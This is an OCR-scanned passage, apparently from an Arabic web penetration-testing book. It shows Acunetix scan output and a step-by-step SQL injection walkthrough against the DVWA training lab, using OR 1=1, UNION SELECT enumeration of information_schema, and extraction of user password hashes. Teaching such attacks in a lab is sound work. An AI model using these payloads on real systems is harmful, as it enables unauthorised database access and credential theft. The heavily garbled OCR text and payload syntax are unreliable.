* (@ğ Fë Application Error Disclosure (58) r EE 9 
چ‎ yT Wasc Id: 19 


الآن أصبح لديك عنوان ا۴ل الهدف وأصبحت تعرف البارامترات التي 
تحوي على تغرات. يمكنك إرسال دخل خبيث إلى تطبيق الويب من خلال 
المتصفح للقيام بعملية الاستغلال. 
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1 يمكنك استخدام بروكسي لاعتراض الطلبات وتعديل قيمة البارامترات 
أg‏ يمكنك استخدام أداة إضافية مثل مة"اوء لاستغلال هذا التطبيق. 


HTNL or XML dl Jکش یمکن تصدیرہ على‎ Z2۸۴ التقریر الکامل ل‎ 
Reports ioĞilã Jالخ من‎ 


: Acunetix 
وهو باحث عن الثغرات في تطبيقات الويب ويقوم بشكل اتوماتيكکي‎ 
تغرات‎ 5 e" 5 
SQL Injection, XSS, XXE, SSRF, HOST Header Attacks 
and over 500 web vulnerabilities 
ويحوي على العديد من الأدوات المستخدمة في عملية اختبار اختراق‎ 
تطبيقات الويب‎ 
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®@acunetix 


Acunetix Web Vulnerability Scanner 


Web Scanner | scan your web applications automatically for vulnerabilities 

@ Tools | customize your security assessments with an extensive set of tools 
î Web Services Scan your web services automatically for vulnerabilities 

E} Configuration | Application preferences and scanning profiles 

E} General | check for product updates, find help, and modify your license 


Common Tasks 


|] New Scan | Start a new website scan 

Sample Scan | Load the results from a sample scan session‏ و 
New WS Scan | Start a new web service scan‏ @ 

٣٦ Reporter |View, customize, and publish vulnerability reports 
@ Scheduler | Schedule an automated scan 

I@ AcuSensor | Enable and configure AcuSens or 
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في نهاية عملية الفحص يمكنك الحصول على تقرير يحوي على الثغرات 
المكتشفة مع شرد مفصل لكيفية استغلال هذه الثفرة والروابط 
المتأثرة بالإضافة إلى طرق الحماية والحلول المقترحة. 


la) Acunetix Web Vulnerability Scanner (Enterprise Edition) 2 Dl xl 


File Actions Tools Configuration Help 
New san j i A A 4 B5 Û f 


[Tools Dplorer Pl 1 | de | ll | Ê Report | O | startunt: >] Profie: >] Bsr 
Web Vulnerability Scanner 
O We ر الات‎ EL ڪا‎ Alerts summary 253 alerts ا‎ 
-@ Tools E- j Scan Thread 1 ( http://testphp. vulnweb.com:80/ ) 
H- Eî Web Services 3 ۳ Web Alerts (253) سر و م ا و‎ | Acunetîx Threat Level 3 
H-@ Configuration @ Blind SQL Injection (35) E One or more high-severity type vulnerabilities 
#-@î General E- @ CRLF injection/HTTP response splitting (verified) (1] Level 3: Hig have been discovered by the scanner, A 


F- @ Cross site scripting (2) 

E @ Cross site scripting (verified) (38) 
FF @ Directory traversal (verified) (2) 
FH @ HTTP parameter pollution (2) 


san, malicious user can exploit these vulnerabilities 
and compromise the backend database and/or 
deface your website, 


FF @ nginx SPDY heap buffer overflow (1) Total alerts found 253 
EH" @ Script source code disclosure (1) @ High ل‎ 
F- @ server side request forgery (2) @ Medium 57 E 
© SQL injection (verified) (43) ا د‎ EE mM 
ınformatıonai 
ڪڪ‎ 


E- @ .htaccess file readable (1) 
O Application error message (15) 
O Backup files (2) 


E8 


8 


E = information http://testphp.vulnweb.com:80/ 


H- @ Directory listing (14) a Silks 59154 requests 

© Frror message on page (6) 

8ã 0 HTML form without CSRF protection (6) Scan time 16 minutes, 11 seconds 
ã 0 Insecure crossdomain.xml file (1) Number of EEE 59154 1 

Hi 0 JetErains iden project directory (1) E E time 74.56 milliseconds 

& ©@ PHP allow_url_fopen enabled (1) e ٍ 

E 6O PHP errors enabled (1) 

FF @ PHP open_basedir is not set (1) Response time history 
FF @ PHPinfo page found (2) 

FH © Source code disdosure (2) 

FH" © URL redirection (1) 


Fl 


O User credentials are sent in dear text (1) 
© User-controlled form action (1) 


4M ııe ETN lan ln fauna 111 
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ans 
“iuiuseconsaaoo 


محتوى هذا الفصل: 
SQL injection ="‏ 


حقن تعليمات لنظام التشغيل 
Web shells ="‏ 


Information security should be layered, like an 
onion. lt should not make you cry like an onion. 
There's a difference. 
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مقدمة: 


مختبر الاختراق يستطيع استغلال ثغرة حقن الكود من خلال تقديم دخل 

يدوي خبيث يجعل تطبيق الويب يقوم بعمل غير مسموح به كعرض 

المعلومات الحساسة (الأسماء وكلمات الس أو تنفيذ تعليمات النظام 

(إضافة حساب مدير 

هجوم حقن الكود من أخطر أنواع الهجمات التي تتعرض لها تطبيقات 

الويب اليوم بسبب قوة تأثيرها وعدد المستخدمين الذي ما زالت التغرة 
ö ee ooo‏ في e.‏ ا e‏ اتهم. 

هجوم حقن الكود يتم نتيجة لنقص في إجراءات الحماية. 

تطبيقات الويب تصنع من قبل مبرمج وبالتالي فإن إمكانية حدوث أخطاء 

هو أمر وارد وهذه الأخطاء هي سبب لوجود التغرات. 

بعض أنواع الحقن في تطبيقات الويب هي: 


Structured query language (SQL) Glılط‎ jãح‎ " 


Lightweight directory access protocol aٽlılطhط‎ ja " 
(LDAP) 
XML path language (XPATH) ٽlڊılط‎ jãح‎ " 
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في هذا الفصل سوف نقوم بهجوم لاستغلال تغرة حقن الكودء وسوف 
نتعلم تفاصيل عملية استغلال حقن طلبات قواعد البيانات وحقن تعليمات 
نظام التشغيل 

SQL injection and operating system commands 
أمر مهم أخر يجب أن تدركه في هجوم الحقن هو القيام بالهجوم أثناء‎ 
التفاعل مع تطبيق الويب كمستخدم شرعي, هذا يعني أن الترفك (حركة‎ 
البيانات) الخاصة بك وإجابات تطبيق الويب سوف تبدو مماثلة للطلبات‎ 


الأخرى الغير خبيثة. 

:SQL injection ٽlIرغi‎ 

SQL injection‏ هو أحد أقدم ثغرات تطبیقات الویب ومازال مستمراً 
حتى الآن ويعتبر من أكبر المخاطر على تطبيقات الويب. 

SQ) injection‏ قدیم حداً ومدمر حداً وعملية تصليحه سهاة جداً. 


آأظهرت بعض الدراسات الحديثة أن نمزم اه5 مازالت موجودة في 
0 من تطبيقات الويب الحالية. 


تغرات ۸n٥ناc‌ع‌زمi SQ‏ تحدث لسببین: 


ضعف في عملية تنقيح دخل المستخدم (المبرمج لم يقم بعملية 
فلترة أو تصفية لمتغير الدخل). 
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١‏ البيانات والتحكم مدمجان في نفس قناة النقل. 
الضعف في عملية تنقيح دخل المستخدم 7 اأفةاكة بالففز فن 
الجزء الخاص بالبيانات ( السلسة النصية الموجودة بين إشارات تنصيص 
مفردة) إلى حقن تعلیمات تحكم )oڎJ (SELECT, UNION, AND, OR‏ 
يجب أن تفهم كيف تتم عملية تدفق المعلومات في بنية مؤلفة من 
ثلاث صفوف هي المستخدم سيرفر الويب وسيرفر قاعدة البيانات كما 
في الشكل التالي: 


SELECT * FROM 
PRO RSS اا‎ 0 


www, victim,com/showproducts.asp? e =Ccars 


AUDI 
ا‎ 

Web Server O CART | U 
FoR | Database Server 
SEAT 1 


.١‏ المستخدم يرسل طلب إلى سيرفر الويب. 

. سيرفر الويب يقوم بسحب البيانات التي ادخلها المستخدم 
ويقوم بخلق عبارة اه5 تحوي على دخل المستخدم ويرسلها 
كطلب إلى سيرفر قاعدة البيانات. 

. سيرفر قاعدة البيانات يقوم بتنفيذ طلب اه8 بدون أن يعرف 
منطق التطبيق, فقط يقوم بتنفيذ الطلب ويعيد النتيجة إلى 


سيرفر الويب. 
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؛. سيرفر الويب يقوم بخلق صفحة ۸۲۷1 بشكل ديناميكي 
بالاعتماد على الاجابة القادمة إليه من سيرفر قاعدة البيانات 
ويرسلها إلى المستخدم. 


كما ترى فإن سيرفر الويب وسيرفر قاعدة البيانات منفصلان,ء سيرفر 
الويب فقط يقوم بخلق طلب اه5 ويترجم النتيجة ويعرضها للمستخدم 
أما سيرفر قاعدة البيانات فهو يستقبل طلب اه5 وبعيد النتيجة إلى 
سيرفر الويب وهذا مهم جداً من أجل استغلال ثغرات SQL injection‏ 
لأننا نستطيع التلاعب بعبارة ا8۵ وجعل سيرفر قاعدة البيانات يعيد 
بيانات مهمة مثل أسماء المستخدمين وكلمات المرور. 

من المهم أن تكون مدرك لرسائل الخطاً المختلفة من قاعدة البيانات 
والتي ستحصل عليها من سيرفر الويب عندما تقوم باختبار ثغرة اهS‏ 
injection‏ 

الشكل التالي یظھر کیف یحدث خطاً ۸ہ‌c†iعزہi‏ ا8۵ وکیف پتعامل 


سيرفر الوبب معه. 


SELECT " FROM 
PRODUCTS WHERE 


www.victim.com/showproducts.asp ?category=attacker’ 
category = ‘attacker 


1 r" 


CY 
User 4 3 
-01756: quoted Web Server ORA-01756: quoted Oracle 


string not properly string not properly Database Server 
terminated terminated 
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.١‏ المستخدم يرسل طلب لمحاولة معرفة إذا كانت ثغرة ا58۵ 
injection‏ موجودة في هذا التطبيق. في هذه الحالة 
المستخدم يرسل القيمة أو الاسم مضافاً إليه علامة تنصيص 
مقفردة. 

". سيرفر الويب يسحب بيانات المستخدم ويرسل طلب اه5 إلى 
سيرفر قاعدة البيانات. في هذا المثال فإن عبارة اه8 التى 
سيخلقها سيرفر الويب سوف تحوي على دخل المستخدم 
وعلامة التنصيص المفردة المضافة من قبل المستخدم بالإضافة 
إلى علامة تنصيص مفردة أخرى يقوم التطبيق بإضافتها. 

۳. سيرفر قاعدة البيانات يستقبل طلب اه8 المشوه ويعيد رسالة 
خطاً إلى سيرفر الويب. 

؛. سيرفر الويب يستقبل رسالة الخطاً من سيرفر قاعدة البيانات 
ويرسلها كإجابة على شکكل ا۳۲۷ إلى المستخدم. 


المثال السابق يشرح سيناريو الطلب من المستخدم الذي يحرض رسالة 
خطاً في قاعدة البيانات بالاعتماد على كود التطبيق فإنه سيتم إعادة 
النتيجة في الخطوة الرابعة بإحدى هذه الطرق: 

SQ) error .١‏ يعرض على متصفح المستخدم. 


SQ) error .‏ يخفى في مصدر صفحة الويب لأغراض تصليح 
الأخطاء. 
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۳. إعادة التوجيه إلى صفحة أخرى. 

؛. 500 HT error code‏ (خطأ داخلى بالسیرفر) 
HTTP redirection code 302 gÎ‏ 

. التطبيق يتعامل مع الخطاً بشكل فوري ويظهر آنه لا يوجد 
نتيجة 1 يظطهر صفحة خطاً عام. 


:SQL injection gIgiÎ 


Error-Based SQL Injection =" 
Union-Based SQL Injection *" 
Blind SQL Injection =" 


:Error 

إرسال طلب إلى قاعدة البيانات يسبب خطاً وجمع المعلومات من رسالة 
الخطاً. 

:Union 

SQ union‏ يستخدم لدمج نتيجة أكثر من عبارة ا8۵ في طلب واحد. 
:Blind‏ 

سؤال قاعدة البيانات nەques†i true/false‏ والنظر فيما إذا تم إعادة 


5 0 1 0 أو لا. 
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:SQAL injection ڙlıiخ|‎ 


التعريف: 
" معرفة وجود الثغرة (بشكل يدوي أو باستخدام أداة) 
٠‏ تحديد نوع تغرة الحقن 

الهجوم: 
Error-Based "‏ (سھلJ‏ جداً) 


Union-Based »‏ (رائع من أجل استخراج البیانات) 
Blind‏ (أسواً حالة, آخر الاحتمالات) 


الاختبار بشكل يدوي أمر ضروري لأن أداة البحث يمكن أن تبحث عن نوع 
واحد من الحقن ولا تجد ثغرة في الموقع بينما بالحقيقة الثغرة تكون 


موجودة. 


:SQL Interpreter pجرiaoll‎ 


أحد الجوانب الأساسية لهذه الثغرة هي أنه يجب عليك فهم هل مترجم 
ا فعال. 
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المترجم يأخذ الدخل ويعمل عليه فوراً بدون أن يكون عليه الذهاب عبر 
عمليات البرمجة التقليدية التجميع gÎ compiling‏ تصليح الأخطاء 


debugging‏ والتشغیل. 
مثلاً مترجم ا5۵ يلعب الجزء الأساسي عندما تبحث عن كتاب غير مجاني 


جديد في مخزن ببيع عبر الانترنت بشكل أون لاين. 


هذا الكود سوف ينتظر كجزء من تطبيق الويب لقوم أنت بالبحث عن 
المنتج الذي تريده عن طريق ادخال اسم المنتج في صندوق البحث 


String query = “SELECT * FROM book WHERE bookName=’” + 
request.getParam(‘term”) +“, 


عندما تبحث عن كتاب اعمس وہ )ه١۳‏ سوف تقوم بالعمليات التالية: 


.١‏ سوف تدخل اسم الكتاب امس و )ه۸٣‏ في صندوق البحث في 
موقع المكتبة أو المتجر الذي يبيع بشكل أون لاين ثم تقوم 
بالضغط على زر أبحث. 

". التطبيق يقوم بتخزين دخل المستخدم في المتغير المسمى 
term‏ 

۲. التطبيق يبنى طلب اه5 الذي یکون مکون من بعض الذکواد 
المكتوبة مسبقاً والمتغير ۳٣6ا‏ المستخدم في طلب 1١١۳۲۴‏ 

؛. التطبيق يرسل طلب اه8 إلى قاعدة البيانات حيث يتم تنفيذها 


من قبل مترجم ا8۵ 
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. النتائج سترسل إلى التطبيق ليقوم بعرضها في متصفح 
المستخدم. 
تعليمة طلب ا8۵ التي سيتم تنفيذها عند عملية البحث عن كتاب 
:aa Hacking web‏ 


String query = “SELECT * FROM book WHERE bookName= Hacking 
web’, 


بعض اساسیات :اSQ۵‏ 


ببساطة لقد قمنا باختيار كل الأعمدة (*) 
(ID number, bookName, bookPrice)‏ 


من جدول ءkه‌هط‏ لایجاد إذا کان web‏ وہ ۸)i‏ مسجل في عمود 


bookName 


النتيجة ستعيد قاعدة بيانات مشابهة للجدول التالي: 


bookName bookPrice 


1001 Wireless network 
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٠‏ الطلب يتعامل مع متفير واحد من نوع و٠أ٣اء‏ الذي يمر إلى 
المترجم وهذا هو سبب وضع اشارتي تنصيص قبل S٤۴) ٤ ٥۲‏ وفي 

١‏ طلب المستخدم الذي يريد البحث عنه يجمع بواسطة التابع 
etParamو.equestا‏ ويخزن داخل علامة تنصيیص واحدة کمتغیر من 
نوع نصي tring‏ بالتاآکید اسم الکتاب N2۳‏ )0ط هو متغیر 
نصي. 
أول إشارة تنصيص يجب أن تكون بعد =" N2‏ )0٥ط‏ وثاني إشارة 
تنصيص يجب أن تكون قبل إشارة التنصيص المزدوجة. 


هذا هو طلب اه8 الفعلي الذي يتم تنفيذه من قبل المترجم 


SELECT * FROM books WHERE bookName= hacking web’ 


ا۵ من أجل الاختراق: 


من المهم أن تفهم كيف يتم بناء هذا الطلب, الطلب يقسم إلى ثلاثة 
أجزاء هي: 
SELECT * FROM book WHERE bookName=' .\‏ 
هذا الجزء من الكود يتم كتابته مسبقاً من قبل المبرمج ويجعل 
التطبيق ينتظر دخل المستخدم. 
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'. المتغیر (ebسw‏ وہi)ءھہ) tem‏ یتم تقدیمه إِلی اول جزء من 
الكود, المستخدم هو الذي يتحكم بقيمة هذا المتغير. 
. إشارة التنصيص () تضاف من قبل البرنامج مباشراً بعد دخل 
المستخدم لإكمال تعلمية اه8 وتصبح تعليمة صحيحة يمكن 
تنفيذھها من SQL interpreter pجioll Ja‏ 
مختبر الاختراق يستطيع خلق دخل خبيث بدل اسم الكتاب ويدخله في 
صندوق البحث لاستغلال تغرة n٠ااءعزمİ‏ ا8۵ مع المحافظة على كتابة 
الدخل بين علامات التنصيص لكي لا تظهر رسالة خطاً 
مثال كلاسيكي على هذا الاستغلال هو إدخال التالي إلى صندوق 
البحث 
Hacking web’ OR 1=1#‏ 


هذا الدخل سيبني عبارة اه8 التالية وإرسالها إلى المترجم ليقوم 


SELECT * FROM books WHERE bookName='hacking web" OR 
1=1# 


اشارة # هي comme‏ ineاin‏ تجعل المترجم يتجاهل کل شيء بعدها 


نتيجة عبارة ا5۵ لهذا الكود المحقون هي: 


SELECT * FROM books WHERE bookName='hacking web’ OR 
=1 
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لاحظ كيف أصبح الدخل (اسم الكتاب) بين علامتي التنصيص فااعلامة 
الاولى تكون مكتوبة مسبقاً من قبل المبرمج والعلامة الثانية قمنا نحن 
بإدخالها بعد الدخل (اسم الكتاب) 


اشارة التنصيص () التي يتم إضافتها إلى نهاية دخل المستخدم من 
قبل التطبيق سيتم تجاهلها بسبب وجود # التي هي inline comment‏ 
لن يتم عرض طعس وہi)عءجط‏ فقط بل سيتم عرض كل الكتب الموجودة 
لأن 1=1 دائماً محققة 

hacking web" OR ‘'a'='a 
نحن نعلم بالضبط أين ستضاف علامة التنصيص () وبالتالي النتيجة‎ 
ستكون عبارة ا5۵ صحيحة وستصبح كالتالي:‎ 


SELECT * FROM books WHERE bookName='hacking web" OR 
"a'='a 
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:SQL injection مpgجa‎ 


یجب أن تکون قد فهمت اساسیات ۸٥ناcمزمi SQ‏ , سوف نستخدم 
بيئة 0۷۷۸ لمحاولة استخراج صفحة الثغرة, هدفنا من هذا القسم هو: 


.١‏ تحطيم التطبيق لإثبات أن الدخل الذي نقوم بإدخاله يؤثر على 
سلوك التطبيق. 
؟. سحب أسماء المستخدمين من قاعدة البيانات للقيام بهجوم 
تجاوز المصادقة. 
.٣‏ استخراج معلومات مفيدة من قاعدة البيانات (مثل الهاش 
الخاص بكلمات المرور. 
؛. كسر هاش كلمة السر وبالتالي سنعرف اسم المستخدم وكلمة 
السر لكل مستخدم في التطبيق. 
في هذا الكتاب سوف نتعامل مع اN/8۵‏ فقط لأنها قاعدة البيانات 
المستخدمة في بيئة 0۷۷۸ 


في اMyS۵‏ يوجد فقط in4اB nion-Based and‏ وفي هذا الکتاب 
سوف نتعامل hûãû Union-Based 2o‏ 


يمكن الوصول إلى هذه تغرة من خلال الضغط على ٣هiاءعزمİ‏ ا8۵ في 
القائمة اليسرى في ه0۷۷ 
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ES Vulnerability: SQL Injection 


Instructions 
Setup / Reset DB User ID: Submit | 


Brute Force 


ERR THEE More Information 
CSRF e http://www.se curite am.com/se curityreviews/9DPON1P76E.html 
. e https://en.wikipedia.org/wiki/SQL_injecti 
File Inclusion e http://ferruh.mavituna.com/sql-injection-cheatshe et-o ku/ 
File Upload e http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet 
e https://www.owasp.org/index.php/SQL_Injection 
Insecure CAPTCHA e http://bobby-tables.com/ 


SQL Injection 


SQL Injection (Blind) 
XSS (Reflected) 
XSS (Stored) 


DVWA Security 


:SQL injection إیجاد تغرة‎ 


أول مهمة يجب القيام بها هي إيجاد ثغرة ١هناءمزم‏ ا8۵ في هذه 
الصفحة, منذ 15-10 سنة ماضية عندnما SQL injection Jاlliwl pi‏ 
لأول مرة كان إيجاد الثغرة أمر سهل جداً ويتم من خلال وضع إشارة 
تنصيص واحدة () داخل صندوق البحث ومشاهدة ردة فعل التطبيق. 
إشارة التنصيص المفردة ستؤدي إلى خلل في صيغة التعليمة والتطبيق 
سوف يرد برسالة خطاً. يمكننا محاولة معرفة إذا كان 0۷۷۸ يحوي على 
ثغرة ٣٥ء‏ هزم¡ ا8۵ من خلال استخدام نفس الطريقة أي ادخال اشارة 


تنصيص مفردة () فى User |0 textb0×‏ 
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أو بدل ذلك سوف نقوم بإدخال سلسة نصية مع إشارة تنصيص مفردة 
كالدخل التالى: 


Vulnerability: SQL Injection 


User ID: jjameel' Submit 


هذا الدخل سيوؤدي الى ظهور خطاً ا التالي: 


An error occured: Please make sure the ../../external/phpids/0.6/lib/IDS/tmp folder is writable 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''jameel''' at line 1 


في هذا التطبيق كل دخل المستخدم يكون مغلف في مجموعتين من 
إشارات التنصيص المفردة (ليست إشارة تنصيص مزدوجة) 
نحن لا نعلم الجدول بالضبط أو أسماء الأعمدة حتى الآن ولكن من الآمن 
افتراض أن دخانا قام بخلق طلب مشابه للطلب التالى: 

SELECT * FROM users WHERE User_/D= “‘“Jameel”’ 
هذا الطلب والذي يتبعه حطم التطبيق, وهذا يثبت أنه يمكننا التحكم‎ 
بعبارة ا8۵, من المهم أن تكون على معرفة برسائل الخطاً الخاصة‎ 
بتطبيقات الويب لأنها في غالب الأحيان تكون رأس الخيط اعملية‎ 


الاختراق. 
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فكر بشكل جيد بالبارامترات التي ستقوم بإدخالها والتي يمكن أن تكون 
جزء من الطلبات التي ترسل إلى قاعدة البيانات, هذه هي البارامترات 
التي يجب أن تستخدمھا لاختبlر‏ إoكilة SQL injection‏ 


بنود كبارامترات ۱٥0‏ التعدادية مثل ۱0=81ل أو البحث عن أسماء نصية 


مثل اسم الکتاب کہا في الفقرة السابقة و البارامترات التي تحوي على 
sort=ASC or sort=DESC Jûo string ID‏ 


تجاوز المصادقة: 


يمكننا الآن بناء عبارة اه8 شرعية يتم تنفيذها وتقوم بكشف معلومات 
لا نملك الحق بمعرفتها. نحن نعرف أننا نتعامل مع عمود نصي لن اشارة 
التنصيص أضيفت إلى دخاناء لذلك نستطيع استخدام إما ه"='ه' ٣ه‏ 1=1 

سوف نقوم بكتابة الدخل التالي: 


Jameel’ or 'a'='a 


Vulnerability: SQL Injection 


User |D: |Jameel' or 'a='a || Submit 


هذا الطلب تم تنفيذه بنجاح وأظهر بعض النتائج المفيدة من قاعدة 
البيانات كما يظهر في الشكل التالي: 
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Vulnerability: SQL Injection 


User ID: | | | Submit 
ID: Jameel' or 'a'=' a 

First name: admin 

Surname: admin 


ID: Jameel' or 'a'='a 
First name: Gordon 
Surname: Brown 


1B: Jameel' or 'a'='a 
First name: Hack 
Surname: Me 


ID: Jameel' or 'a'='a 
First name: Pablo 
Surname: Pıcasso 


TO: Jameel' or 'a'='a 
First name: Bob 
Surname: Smith 


رغم أن معظم النتائج هي فقط الاسم الأول والاسم الأخير لكل 
مستخدم فإن النتيجة الأولى تظھر ٣i٣‏ ۵ة في كل من الاسم الأول 
والاسم الأخير يمكننا أن نفترض أن هذا الاسم هو لمدير تطبيق الويب 
ولكن يجب أن نتأكد من ذلك قبل القيام بتجاوز المصادقة. 

يجب أن تكون على معرفة بأداء cksھatt SQL injection‏ بواسطت ویب 
بروكسي وبالتالي ستستطيع رؤية الطرق المختلفة التي يقوم بها 
التطبيق بمعالجة دخل المستخدم, يمكنك استخدام yر×ە٣۴‏ ما Bu‏ للقيام 
بنفس هذا الهجوم من خلال تفعيل الاعتراض امعء٣‏ عام¡ ومشاهدة 


البرامترات. 
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Burp Repeater‏ هو ادات آخری في Burp Suite‏ لھا تاثیر فعال خلال 


هجوم الحقن لأنها تسمح لك بإعادة تعريف وتحديد الطلب بشكل يدوي 
وإرساله إلى التطبيق, يمكنك استخدام هذه التقنية لتقوم بتغير محدد 
في السلسة النصية (مثل ترميز قيمة حرف واحد) وإعادة ارسالها دون 


إعادة بناء الطلب من الصفر بشكل كامل. فهي مفيدة في توفير الوقت 
والتأكد من أنك قمت بتغير الجزء الذي تريده من الطلب فقط. 


الطلب السابق ه'='ه' ٣ه‏ 'اممصهل يظهر بالشكل التالي بعد إلتقاطه من 
قبل ام nterceا Burp‏ كما في الشکل التالي: 


Target | Poy | Spider | Scanner | Intruder | Repeater | Sequencer | Dec 


1 Intercept | HTTP history WebSockets history Options 


l# | Request to http://127.0.0.1:80 


| Forward أ‎ Drop | | Intercept is on | | Action | 


Raw | Params | Headers | Hex 


SET /dvwa/vulnerabilities/sqli/?id=Jameel$27tor+t$27a$27%$ 3D$27a& Sub: 
ost: 127.0.0.1 

Jser-Agent: Mozilla/S5.O0 (Xll; Linux x86_64; rv:38.0) Gecko/2010010 
Accept: text/html,application/xhtmltxml,application/xml ; q=0.9,*/*; 
Accept-~Language: en-US,en; q=0. 5 

Accept-Encoding: gzip, deflate 

Referer: http://l127.0.0.1l/dvwa/vulnerabilities/sqli/ 

Coorie: security=low; PHPSESSID=3nmt0O fuSnppg20upb 9p Snlrole0 
connection: keep-alive 
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استخراج معلومات إضافية: 
نحتاج لاستخراج معلومات إضافية مفيدة مثل اسم المستخدم وكلمة سر 
المديرء هناك عدة أنواع من الحقن التي يمكن من خلالها الحصول على 
اسم المستخدم وكلمة السر للمدير ومنها: 

.١‏ كشف اسم قاعدة البيانات. 

. كشف أسماء الجداول في قاعدة البيانات التي اخترناها كهدف. 

۳. كشف أسماء الأعمدة في الجدول الذي اخترناه كهدف. 

؛. سحب البيانات من الأعمدة التي نختارها كهدف. 
هناك عدة توابع موجودة في قاعدة البيانات يمكننا استدعائها من خلال 
هذه التغرة لکشف معلومات حساسة, کلھا تستخدم عبlرö SQL union‏ 
التي تسمح بدمج أكثر من طلب استعلام وهذا ضروري لأن الطلب 
يستطيع استخراج معلومات عادية مثل الاسم الأول والاسم الأخير. 
نحتاج طلب أقوى لتنفيذه من أجل استغلال تطبيق الويب وعرض 
معلومات حساستة, من اجل أن تعمل ۸٣٥نہں‏ کل عبارۃة SELE C7‏ یجب ان 
يكون لها نفس رقم الأعمدة وهذه الأعمدة يجب أن يكون لها نفس 
نوع البيانات والأعمدة في كل عبارة ٥۲‏ ۴ا8۴ يجب أن تكون بنفس 
الترتيب 
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نحن نعرف مسبقاً أن الطلب قد أعاد لنا عمودين نصيين (الاسم الأول 
والاسم الأخين لذلك فإن الطلب المزدوج يجب أن يعيد عامودين نصيين, 
سوف نستخدم نوع البيانات في العمود الأول اام لن نوع البيانات ااuم‏ 
يمكن أن يمثل أي نوع من البيانات و سنستخدم العامود الثاني (الاسم 
الأخير) ويمكن أن نعمل مع أكثر من عامود من خلال استخدام عدة 
عواميد متسلسلة للاسم الأخير بواسطة التابع أوءمجء كجزء من الهجوم 
هذا سوف يسمح لنا بكشف معلومات حساسة من قاعدة البيانات 

Jameel/' or 1=1 union select null, database # ()‏ 
النتيجة لهذا الطلب المدمج سوف تتضمن الاسم الأول والاسم الأخير 
وفي السطر الأخير سوف يظهر اسم قاعدة البيانات وهو aس۷wك‏ كما 
في الشكل التالي: 
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Vulnerability: SQL Injection 


User ID: | | | Submit 


ID: Jameel' or 1=1 union select null, database 
First name: admin 
Surname: admin 


ID: Jameel' or 1=1 select null, database 
First name: Gordon 
Surname: Brown 


ID: Jameel' or 1=1 select null, database 
First name: Hack 
Surname: Me 


ID: Jameel' or 1=1 select null, database 
First name: Pablo 
Surname: Pıcasso 


TID: JaMBSL' oF 1=1 select null, database 
First name: Bob 
Surname: Smith 


ID: Jameel' or 1=1 null, database 
Fırst name: 
Surname: dvwa 


اعرض كل أسماء الجداول: 


Jameel’ and 1=1 union select null, table_name from 
information _ schema.tables# 


حيث ا information schema‏ ھي مجموعة من البيانات الخاصة بقاعدة 
البيانات والتي تخزن في نظام إدارة قاعدة البيانات كما يظهر في 
الشكل التالي, ولننا نحاول تجاوز المصادقة فان جدول s٣موں‏ سیکون 


هدف انا 
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Vulnerability: SQL Injection 


User ID: | | Submit 


ID: Jameel' and 1=1 union select null, table_name information_schema. 
Fırst name: 
Surname: CHARACTER_SETS 


ID: Jameel' and 1=1 union select null, table_name information_schema. 
Fırst name: 
Surname: COLLATIONS 


ID: Jameel' and 1=1 union select null, table_name information_schema. 
Fırst name: 
Surname: COLLATION_CHARACTER_SET _APPLICABILITY 


ID: Jameel' and 1=1 union select null, table_name information_schema. 
Fırst name: 
Surname: COLUMNS 


ID: Jameel' and 1=1 union select null, table_name information_schema. 
Fırst name: 
Surname: COLUMN_ PRIVILEGES 


ID: Jameel' and 1=1 union select null, table_name information_schema. 
Fırst name: 
Surname: ENGINES 


ID: Jameel' and 1=1 union select null, table_name information_schema. 
Fırst name: 
Surname: EVENTS 


ID: Jameel' and 1=1 union select null, table_name information_schema. 
First name: 
Surname: FILES 


الجدول التالي يظھر أسماء جداول المعلومات Jlذlتjıت metadata‏ 


esاtab‏ اعدد من قواعد البیانات 


Database Metadata Table 
MySQL Information_schema 


MS-SQL sysobjects or 
INFORMATION_SCHEMA 


Oracle all_user_objects 
PostgreSQL INFROMATION_SCHEMA 


اختبار اختراق سيرفرات وتطبيقات الويب 


لعرض أسماء الأعمدة في جدول المستخدمين ماه ٣هئں‏ : 


Jameel’ and 1=1 union select null, concat{table_name, OxOa, 
column_name) from information_schema.columns where 
table_name='users# ' 


لأننا استخدمنا العمود الثاني كهدف للحقن فإن كل النتائج ستكون من 
هذا العامود, هذا يعني أن العمود الأول من النتيجة (الاسم الأول) 
سيكون دائماً فارغ لأننا لم نقم بحقن ااام في هذا العامود. 

العامود الثاني في النتيجة ( الاسم الأخير) يحوي على سلسلة من 
النتائج (باستخدام التابع أةءمهء) هذه السلسلة تحوي على اسم 
الجدول ك٣موں‏ الذي يظهر كالاسم الأخير ثم الانتقال إلى سطر جديد 


( لأننا استخدمنا 0×02 في الحقن) وٿم اسم کل عnصgود users table‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


Vulnerability: SQL Injection 


User ID: | | |_ Submit | 


ID: Jameel' and union select null, concat(table_name, column_name) f information_ 
First name: 

Surname: users 

user_id 


ID: Jameel' and select concat (table_name, column_name) f information_ 
First name: 

Surname: users 

first_name 


ID: Jameel' and concat (table_name, column_name) f information_ 
First name: 

Surname: users 

last_name 


ID: Jameel' and concat (table_name, column_name) f information_ 
First name: 

Surname: users 

user 


ID: Jameel' and 1=1 union select null, concat(table_name, OxOa, column_name) frjom information_ 
First name: 

Surname: users 

password 


أسماء العوامید في جدول s٣موں‏ هي 


user_ id " 
first_name " 
last_name " 
user " 
password =" 
avatar " 


user and password jيدوماعلاب بالتاآکید سیکون اھتمامنا‎ 


اختبار اختراق سيرفرات وتطبيقات الويب 


حصد هاشات كلمات السر: 


لعرض محتوى العامودين ك١٣oسءءمدم‏ همج امus‏ ندخل العبارة التالية: 


Jameel" and 1=1 union select null, concatfuser,OxOa,password) 
from users# 


النتائج التي سوف تظهر هي القيم التي يسعى أي مختبر اختراق 
للحصول عليها. 


سوف نحصل على اسم وكلمة السر لك مستخدم في قاعدة البيانات 


Vulnerability: SQL Injection 


User ID: | | | Submit | 


ID: Jameel' and 1=1 union select null, concat (user, OxOa,password) from 
First name: 

Surname: admin 

5f 4dcc3b5aa765d61d8327deb882cf 99 


ID: Jameel' and 1=1 union select null,concat (user, OxOa, password) from 
First name: 

Surname: gordonb 

e99a18c428cb38d5f 260853678922e03 


ID: Jameel' and 1=1 union select null,concat (user, OxOa, password) 
First name: 

Surname: 1337 

Sd3533d75ae2c3966d7eO0d4f cc59216b 


ID: Jameel' and 1=1 union select null,concat (user, OxOa, password) from 
First name: 

Surname: pablo 

od107do9f 5bbe40cade3de5c7le9e9b7 


ID: Jameel' and 1=1 union select null,concat (user, OxOa,password) from 
First name: 

